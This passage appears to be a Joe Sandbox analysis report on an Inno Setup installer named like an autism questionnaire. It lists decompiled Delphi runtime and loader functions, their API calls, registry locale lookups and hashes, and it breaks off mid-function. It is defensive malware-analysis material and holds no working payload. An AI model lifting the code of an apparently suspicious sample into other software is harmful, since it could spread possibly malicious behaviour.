                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2441996862-0
                                                                                              • Opcode ID: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                                                              • Instruction ID: 3a96586125c0dafbea7f6284d897bb751f900199eded140d0d018ead0d29608e
                                                                                              • Opcode Fuzzy Hash: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                                                              • Instruction Fuzzy Hash: C5212CB1104344BAD730DA99C885F6BBBEC9B56354F04492EF59583681D339E848C766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 73%
                                                                                              			E0040B044(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
                                                                                              				char _v8;
                                                                                              				short _v12;
                                                                                              				void* _v16;
                                                                                              				char _v20;
                                                                                              				char _v24;
                                                                                              				void* _t29;
                                                                                              				void* _t40;
                                                                                              				intOrPtr* _t44;
                                                                                              				intOrPtr _t55;
                                                                                              				void* _t61;
                                                                                              
                                                                                              				_push(__ebx);
                                                                                              				_v24 = 0;
                                                                                              				_v20 = 0;
                                                                                              				_t44 = __edx;
                                                                                              				_v8 = __eax;
                                                                                              				E00407B04(_v8);
                                                                                              				_push(_t61);
                                                                                              				_push(0x40b104);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t61 + 0xffffffec;
                                                                                              				_t21 =  &_v16;
                                                                                              				L00403730();
                                                                                              				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
                                                                                              				E0040858C( &_v20, 4,  &_v16);
                                                                                              				E0040873C(_t44, _v20, _v8);
                                                                                              				_t29 = E0040AEF4( *_t44, _t44); // executed
                                                                                              				if(_t29 == 0) {
                                                                                              					_v12 = 0;
                                                                                              					E0040858C( &_v24, 4,  &_v16);
                                                                                              					E0040873C(_t44, _v24, _v8);
                                                                                              					_t40 = E0040AEF4( *_t44, _t44); // executed
                                                                                              					if(_t40 == 0) {
                                                                                              						E00407A20(_t44);
                                                                                              					}
                                                                                              				}
                                                                                              				_pop(_t55);
                                                                                              				 *[fs:eax] = _t55;
                                                                                              				_push(E0040B10B);
                                                                                              				E00407A80( &_v24, 2);
                                                                                              				return E00407A20( &_v8);
                                                                                              			}














                                                                                              APIs
                                                                                              • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B076
                                                                                              • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B07F
                                                                                                • Part of subcall function 0040AEF4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                                                                • Part of subcall function 0040AEF4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                              • String ID:
                                                                                              • API String ID: 3216391948-0
                                                                                              • Opcode ID: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                                                              • Instruction ID: a9cfc37755e84068b6e5d0711ea0537dd567252b91127d2e7da10f621904fc04
                                                                                              • Opcode Fuzzy Hash: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                                                              • Instruction Fuzzy Hash: 35113674A041099BDB00EB95C9529AEB3B9EF44304F50447FA515B73C1DB785E058A6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 46%
                                                                                              			E0040AEF4(char __eax, signed int __ebx) {
                                                                                              				char _v8;
                                                                                              				struct _WIN32_FIND_DATAW _v600;
                                                                                              				void* _t15;
                                                                                              				intOrPtr _t24;
                                                                                              				void* _t27;
                                                                                              
                                                                                              				_push(__ebx);
                                                                                              				_v8 = __eax;
                                                                                              				E00407B04(_v8);
                                                                                              				_push(_t27);
                                                                                              				_push(0x40af52);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t27 + 0xfffffdac;
                                                                                              				_t15 = FindFirstFileW(E004084EC(_v8),  &_v600); // executed
                                                                                              				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
                                                                                              					FindClose(_t15);
                                                                                              				}
                                                                                              				_pop(_t24);
                                                                                              				 *[fs:eax] = _t24;
                                                                                              				_push(E0040AF59);
                                                                                              				return E00407A20( &_v8);
                                                                                              			}









                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              • Opcode ID: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                                                              • Instruction ID: b27eefbf95a445daf5872925c41aeb1c7ded3ce7930a436f9b8cfd192dc84724
                                                                                              • Opcode Fuzzy Hash: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                                                              • Instruction Fuzzy Hash: 5FF0B471518209BFC710FB75CD4294EB7ACEB043147A005B6B504F32C1E638AF149519
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 78%
                                                                                              			E0040AB18(char __eax, void* __ebx, void* __ecx, void* __edx) {
                                                                                              				char _v8;
                                                                                              				char* _v12;
                                                                                              				void* _v16;
                                                                                              				int _v20;
                                                                                              				short _v542;
                                                                                              				long _t51;
                                                                                              				long _t85;
                                                                                              				long _t87;
                                                                                              				long _t89;
                                                                                              				long _t91;
                                                                                              				long _t93;
                                                                                              				void* _t97;
                                                                                              				intOrPtr _t106;
                                                                                              				intOrPtr _t108;
                                                                                              				void* _t112;
                                                                                              				void* _t113;
                                                                                              				intOrPtr _t114;
                                                                                              
                                                                                              				_t112 = _t113;
                                                                                              				_t114 = _t113 + 0xfffffde4;
                                                                                              				_t97 = __edx;
                                                                                              				_v8 = __eax;
                                                                                              				E00407B04(_v8);
                                                                                              				_push(_t112);
                                                                                              				_push(0x40ad3d);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t114;
                                                                                              				if(_v8 != 0) {
                                                                                              					E0040A34C( &_v542, E004084EC(_v8), 0x105);
                                                                                              				} else {
                                                                                              					GetModuleFileNameW(0,  &_v542, 0x105);
                                                                                              				}
                                                                                              				if(_v542 == 0) {
                                                                                              					L18:
                                                                                              					_pop(_t106);
                                                                                              					 *[fs:eax] = _t106;
                                                                                              					_push(E0040AD44);
                                                                                              					return E00407A20( &_v8);
                                                                                              				} else {
                                                                                              					_v12 = 0;
                                                                                              					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
                                                                                              					if(_t51 == 0) {
                                                                                              						L10:
                                                                                              						_push(_t112);
                                                                                              						_push(0x40ad20);
                                                                                              						_push( *[fs:eax]);
                                                                                              						 *[fs:eax] = _t114;
                                                                                              						E0040A928( &_v542, 0x105);
                                                                                              						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
                                                                                              							if(RegQueryValueExW(_v16, E0040AE30, 0, 0, 0,  &_v20) == 0) {
                                                                                              								_v12 = E004053F0(_v20);
                                                                                              								RegQueryValueExW(_v16, E0040AE30, 0, 0, _v12,  &_v20);
                                                                                              								E00408550(_t97, _v12);
                                                                                              							}
                                                                                              						} else {
                                                                                              							_v12 = E004053F0(_v20);
                                                                                              							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
                                                                                              							E00408550(_t97, _v12);
                                                                                              						}
                                                                                              						_pop(_t108);
                                                                                              						 *[fs:eax] = _t108;
                                                                                              						_push(E0040AD27);
                                                                                              						if(_v12 != 0) {
                                                                                              							E0040540C(_v12);
                                                                                              						}
                                                                                              						return RegCloseKey(_v16);
                                                                                              					} else {
                                                                                              						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
                                                                                              						if(_t85 == 0) {
                                                                                              							goto L10;
                                                                                              						} else {
                                                                                              							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
                                                                                              							if(_t87 == 0) {
                                                                                              								goto L10;
                                                                                              							} else {
                                                                                              								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
                                                                                              								if(_t89 == 0) {
                                                                                              									goto L10;
                                                                                              								} else {
                                                                                              									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
                                                                                              									if(_t91 == 0) {
                                                                                              										goto L10;
                                                                                              									} else {
                                                                                              										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
                                                                                              										if(_t93 != 0) {
                                                                                              											goto L18;
                                                                                              										} else {
                                                                                              											goto L10;
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}





















                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040AD3D,?,?), ref: 0040AB51
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040AB9A
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040ABBC
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040ABDA
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040ABF8
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040AC16
                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040AC34
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D), ref: 0040AC74
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001), ref: 0040AC9F
                                                                                              • RegCloseKey.ADVAPI32(?,0040AD27,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales), ref: 0040AD1A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open$QueryValue$CloseFileModuleName
                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                              • API String ID: 2701450724-3496071916
                                                                                              • Opcode ID: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                                                              • Instruction ID: cdbeddac4db4dda9279672c2614f8dce2a18b15a4a55f9a64fe791b6da82c449
                                                                                              • Opcode Fuzzy Hash: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                                                              • Instruction Fuzzy Hash: FB514371A80308BEEB10DA95CC46FAE77BCEB08709F504477BA04F75C1D6B8AA50975E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 85%
                                                                                              			E004B63A1(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                              				intOrPtr _t17;
                                                                                              				struct HWND__* _t21;
                                                                                              				struct HWND__* _t22;
                                                                                              				struct HWND__* _t25;
                                                                                              				intOrPtr _t26;
                                                                                              				intOrPtr _t28;
                                                                                              				intOrPtr _t36;
                                                                                              				intOrPtr _t39;
                                                                                              				int _t40;
                                                                                              				intOrPtr _t41;
                                                                                              				intOrPtr _t43;
                                                                                              				struct HWND__* _t46;
                                                                                              				intOrPtr _t47;
                                                                                              				intOrPtr _t50;
                                                                                              				intOrPtr _t60;
                                                                                              				intOrPtr _t62;
                                                                                              				intOrPtr _t68;
                                                                                              				intOrPtr _t69;
                                                                                              				intOrPtr _t70;
                                                                                              				void* _t73;
                                                                                              				void* _t74;
                                                                                              
                                                                                              				_t74 = __eflags;
                                                                                              				_t72 = __esi;
                                                                                              				_t71 = __edi;
                                                                                              				_t52 = __ebx;
                                                                                              				_pop(_t62);
                                                                                              				 *[fs:eax] = _t62;
                                                                                              				_t17 =  *0x4c1d88; // 0x0
                                                                                              				 *0x4c1d88 = 0;
                                                                                              				E00405CE8(_t17);
                                                                                              				_t21 = E0040E450(0, L"STATIC", 0,  *0x4be634, 0, 0, 0, 0, 0, 0, 0); // executed
                                                                                              				 *0x4ba450 = _t21;
                                                                                              				_t22 =  *0x4ba450; // 0x1d025e
                                                                                              				 *0x4c1d80 = SetWindowLongW(_t22, 0xfffffffc, E004AF69C);
                                                                                              				_t25 =  *0x4ba450; // 0x1d025e
                                                                                              				 *(_t73 - 0x58) = _t25;
                                                                                              				 *((char*)(_t73 - 0x54)) = 0;
                                                                                              				_t26 =  *0x4c1d90; // 0x4d582c
                                                                                              				_t4 = _t26 + 0x20; // 0x61e129d
                                                                                              				 *((intOrPtr*)(_t73 - 0x50)) =  *_t4;
                                                                                              				 *((char*)(_t73 - 0x4c)) = 0;
                                                                                              				_t28 =  *0x4c1d90; // 0x4d582c
                                                                                              				_t7 = _t28 + 0x24; // 0xc9800
                                                                                              				 *((intOrPtr*)(_t73 - 0x48)) =  *_t7;
                                                                                              				 *((char*)(_t73 - 0x44)) = 0;
                                                                                              				E0041A87C(L"/SL5=\"$%x,%d,%d,", 2, _t73 - 0x58, _t73 - 0x40);
                                                                                              				_push( *((intOrPtr*)(_t73 - 0x40)));
                                                                                              				_push( *0x4c1d84);
                                                                                              				_push(0x4b6680);
                                                                                              				E00422BC4(_t73 - 0x5c, __ebx, __esi, _t74);
                                                                                              				_push( *((intOrPtr*)(_t73 - 0x5c)));
                                                                                              				E004087C4(_t73 - 0x3c, __ebx, 4, __edi, __esi);
                                                                                              				_t36 =  *0x4c1d9c; // 0x0, executed
                                                                                              				E004AF728(_t36, _t52, 0x4ba44c,  *((intOrPtr*)(_t73 - 0x3c)), _t71, _t72, __fp0); // executed
                                                                                              				if( *0x4ba448 != 0xffffffff) {
                                                                                              					_t50 =  *0x4ba448; // 0x0
                                                                                              					E004AF60C(_t50);
                                                                                              				}
                                                                                              				_pop(_t68);
                                                                                              				 *[fs:eax] = _t68;
                                                                                              				_push(E004B6554);
                                                                                              				_t39 =  *0x4c1d88; // 0x0
                                                                                              				_t40 = E00405CE8(_t39);
                                                                                              				if( *0x4c1d9c != 0) {
                                                                                              					_t70 =  *0x4c1d9c; // 0x0
                                                                                              					_t40 = E004AF1B4(0, _t70, 0xfa, 0x32); // executed
                                                                                              				}
                                                                                              				if( *0x4c1d94 != 0) {
                                                                                              					_t47 =  *0x4c1d94; // 0x0
                                                                                              					_t40 = RemoveDirectoryW(E004084EC(_t47)); // executed
                                                                                              				}
                                                                                              				if( *0x4ba450 != 0) {
                                                                                              					_t46 =  *0x4ba450; // 0x1d025e
                                                                                              					_t40 = DestroyWindow(_t46); // executed
                                                                                              				}
                                                                                              				if( *0x4c1d78 != 0) {
                                                                                              					_t41 =  *0x4c1d78; // 0x0
                                                                                              					_t60 =  *0x4c1d7c; // 0x1
                                                                                              					_t69 =  *0x426bb0; // 0x426bb4
                                                                                              					E00408D08(_t41, _t60, _t69);
                                                                                              					_t43 =  *0x4c1d78; // 0x0
                                                                                              					E0040540C(_t43);
                                                                                              					 *0x4c1d78 = 0;
                                                                                              					return 0;
                                                                                              				}
                                                                                              				return _t40;
                                                                                              			}

                                                                                              APIs
                                                                                                • Part of subcall function 0040E450: CreateWindowExW.USER32 ref: 0040E48F
                                                                                              • SetWindowLongW.USER32 ref: 004B641E
                                                                                                • Part of subcall function 00422BC4: GetCommandLineW.KERNEL32(00000000,00422C06,?,?,00000000,?,004B647E,004B6680,?), ref: 00422BDA
                                                                                                • Part of subcall function 004AF728: CreateProcessW.KERNEL32 ref: 004AF798
                                                                                                • Part of subcall function 004AF728: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                                                                • Part of subcall function 004AF728: MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                                                                • Part of subcall function 004AF728: GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                                                                • Part of subcall function 004AF728: CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                                                              • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                                                              • DestroyWindow.USER32(001D025E,004B6554), ref: 004B6514
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                              • String ID: ,XM$/SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                              • API String ID: 3586484885-3367169067
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E0040426C(void* __eax, signed int __edi, void* __ebp) {
                                                                                              				struct _MEMORY_BASIC_INFORMATION _v44;
                                                                                              				void* _v48;
                                                                                              				signed int __ebx;
                                                                                              				void* _t58;
                                                                                              				signed int _t61;
                                                                                              				int _t65;
                                                                                              				signed int _t67;
                                                                                              				void _t70;
                                                                                              				int _t71;
                                                                                              				signed int _t78;
                                                                                              				void* _t79;
                                                                                              				signed int _t81;
                                                                                              				intOrPtr _t82;
                                                                                              				signed int _t87;
                                                                                              				signed int _t88;
                                                                                              				signed int _t89;
                                                                                              				signed int _t92;
                                                                                              				void* _t96;
                                                                                              				signed int _t99;
                                                                                              				void* _t103;
                                                                                              				intOrPtr _t104;
                                                                                              				void* _t106;
                                                                                              				void* _t108;
                                                                                              				signed int _t113;
                                                                                              				void* _t115;
                                                                                              				void* _t116;
                                                                                              
                                                                                              				_t56 = __eax;
                                                                                              				_t89 =  *(__eax - 4);
                                                                                              				_t78 =  *0x4bb059; // 0x0
                                                                                              				if((_t89 & 0x00000007) != 0) {
                                                                                              					__eflags = _t89 & 0x00000005;
                                                                                              					if((_t89 & 0x00000005) != 0) {
                                                                                              						_pop(_t78);
                                                                                              						__eflags = _t89 & 0x00000003;
                                                                                              						if((_t89 & 0x00000003) == 0) {
                                                                                              							_push(_t78);
                                                                                              							_push(__edi);
                                                                                              							_t116 = _t115 + 0xffffffdc;
                                                                                              							_t103 = __eax - 0x10;
                                                                                              							E00403C48();
                                                                                              							_t58 = _t103;
                                                                                              							 *_t116 =  *_t58;
                                                                                              							_v48 =  *((intOrPtr*)(_t58 + 4));
                                                                                              							_t92 =  *(_t58 + 0xc);
                                                                                              							if((_t92 & 0x00000008) != 0) {
                                                                                              								_t79 = _t103;
                                                                                              								_t113 = _t92 & 0xfffffff0;
                                                                                              								_t99 = 0;
                                                                                              								__eflags = 0;
                                                                                              								while(1) {
                                                                                              									VirtualQuery(_t79,  &_v44, 0x1c);
                                                                                              									_t61 = VirtualFree(_t79, 0, 0x8000);
                                                                                              									__eflags = _t61;
                                                                                              									if(_t61 == 0) {
                                                                                              										_t99 = _t99 | 0xffffffff;
                                                                                              										goto L10;
                                                                                              									}
                                                                                              									_t104 = _v44.RegionSize;
                                                                                              									__eflags = _t113 - _t104;
                                                                                              									if(_t113 > _t104) {
                                                                                              										_t113 = _t113 - _t104;
                                                                                              										_t79 = _t79 + _t104;
                                                                                              										continue;
                                                                                              									}
                                                                                              									goto L10;
                                                                                              								}
                                                                                              							} else {
                                                                                              								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
                                                                                              								if(_t65 == 0) {
                                                                                              									_t99 = __edi | 0xffffffff;
                                                                                              								} else {
                                                                                              									_t99 = 0;
                                                                                              								}
                                                                                              							}
                                                                                              							L10:
                                                                                              							if(_t99 == 0) {
                                                                                              								 *_v48 =  *_t116;
                                                                                              								 *( *_t116 + 4) = _v48;
                                                                                              							}
                                                                                              							 *0x4bdb78 = 0;
                                                                                              							return _t99;
                                                                                              						} else {
                                                                                              							return 0xffffffff;
                                                                                              						}
                                                                                              					} else {
                                                                                              						goto L31;
                                                                                              					}
                                                                                              				} else {
                                                                                              					__eflags = __bl;
                                                                                              					__ebx =  *__edx;
                                                                                              					if(__eflags != 0) {
                                                                                              						while(1) {
                                                                                              							__eax = 0x100;
                                                                                              							asm("lock cmpxchg [ebx], ah");
                                                                                              							if(__eflags == 0) {
                                                                                              								goto L14;
                                                                                              							}
                                                                                              							asm("pause");
                                                                                              							__eflags =  *0x4bb989;
                                                                                              							if(__eflags != 0) {
                                                                                              								continue;
                                                                                              							} else {
                                                                                              								Sleep(0);
                                                                                              								__edx = __edx;
                                                                                              								__ecx = __ecx;
                                                                                              								__eax = 0x100;
                                                                                              								asm("lock cmpxchg [ebx], ah");
                                                                                              								if(__eflags != 0) {
                                                                                              									Sleep(0xa);
                                                                                              									__edx = __edx;
                                                                                              									__ecx = __ecx;
                                                                                              									continue;
                                                                                              								}
                                                                                              							}
                                                                                              							goto L14;
                                                                                              						}
                                                                                              					}
                                                                                              					L14:
                                                                                              					_t14 = __edx + 0x14;
                                                                                              					 *_t14 =  *(__edx + 0x14) - 1;
                                                                                              					__eflags =  *_t14;
                                                                                              					__eax =  *(__edx + 0x10);
                                                                                              					if( *_t14 == 0) {
                                                                                              						__eflags = __eax;
                                                                                              						if(__eax == 0) {
                                                                                              							L20:
                                                                                              							 *(__ebx + 0x14) = __eax;
                                                                                              						} else {
                                                                                              							__eax =  *(__edx + 0xc);
                                                                                              							__ecx =  *(__edx + 8);
                                                                                              							 *(__eax + 8) = __ecx;
                                                                                              							 *(__ecx + 0xc) = __eax;
                                                                                              							__eax = 0;
                                                                                              							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
                                                                                              							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
                                                                                              								goto L20;
                                                                                              							}
                                                                                              						}
                                                                                              						 *__ebx = __al;
                                                                                              						__eax = __edx;
                                                                                              						__edx =  *(__edx - 4);
                                                                                              						__bl =  *0x4bb059; // 0x0
                                                                                              						L31:
                                                                                              						__eflags = _t78;
                                                                                              						_t81 = _t89 & 0xfffffff0;
                                                                                              						_push(_t101);
                                                                                              						_t106 = _t56;
                                                                                              						if(__eflags != 0) {
                                                                                              							while(1) {
                                                                                              								_t67 = 0x100;
                                                                                              								asm("lock cmpxchg [0x4bbae8], ah");
                                                                                              								if(__eflags == 0) {
                                                                                              									goto L32;
                                                                                              								}
                                                                                              								asm("pause");
                                                                                              								__eflags =  *0x4bb989;
                                                                                              								if(__eflags != 0) {
                                                                                              									continue;
                                                                                              								} else {
                                                                                              									Sleep(0);
                                                                                              									_t67 = 0x100;
                                                                                              									asm("lock cmpxchg [0x4bbae8], ah");
                                                                                              									if(__eflags != 0) {
                                                                                              										Sleep(0xa);
                                                                                              										continue;
                                                                                              									}
                                                                                              								}
                                                                                              								goto L32;
                                                                                              							}
                                                                                              						}
                                                                                              						L32:
                                                                                              						__eflags = (_t106 - 4)[_t81] & 0x00000001;
                                                                                              						_t87 = (_t106 - 4)[_t81];
                                                                                              						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
                                                                                              							_t67 = _t81 + _t106;
                                                                                              							_t88 = _t87 & 0xfffffff0;
                                                                                              							_t81 = _t81 + _t88;
                                                                                              							__eflags = _t88 - 0xb30;
                                                                                              							if(_t88 >= 0xb30) {
                                                                                              								_t67 = E00403AC0(_t67);
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t88 = _t87 | 0x00000008;
                                                                                              							__eflags = _t88;
                                                                                              							(_t106 - 4)[_t81] = _t88;
                                                                                              						}
                                                                                              						__eflags =  *(_t106 - 4) & 0x00000008;
                                                                                              						if(( *(_t106 - 4) & 0x00000008) != 0) {
                                                                                              							_t88 =  *(_t106 - 8);
                                                                                              							_t106 = _t106 - _t88;
                                                                                              							_t81 = _t81 + _t88;
                                                                                              							__eflags = _t88 - 0xb30;
                                                                                              							if(_t88 >= 0xb30) {
                                                                                              								_t67 = E00403AC0(_t106);
                                                                                              							}
                                                                                              						}
                                                                                              						__eflags = _t81 - 0x13ffe0;
                                                                                              						if(_t81 == 0x13ffe0) {
                                                                                              							__eflags =  *0x4bbaf0 - 0x13ffe0;
                                                                                              							if( *0x4bbaf0 != 0x13ffe0) {
                                                                                              								_t82 = _t106 + 0x13ffe0;
                                                                                              								E00403B60(_t67);
                                                                                              								 *((intOrPtr*)(_t82 - 4)) = 2;
                                                                                              								 *0x4bbaf0 = 0x13ffe0;
                                                                                              								 *0x4bbaec = _t82;
                                                                                              								 *0x4bbae8 = 0;
                                                                                              								__eflags = 0;
                                                                                              								return 0;
                                                                                              							} else {
                                                                                              								_t108 = _t106 - 0x10;
                                                                                              								_t70 =  *_t108;
                                                                                              								_t96 =  *(_t108 + 4);
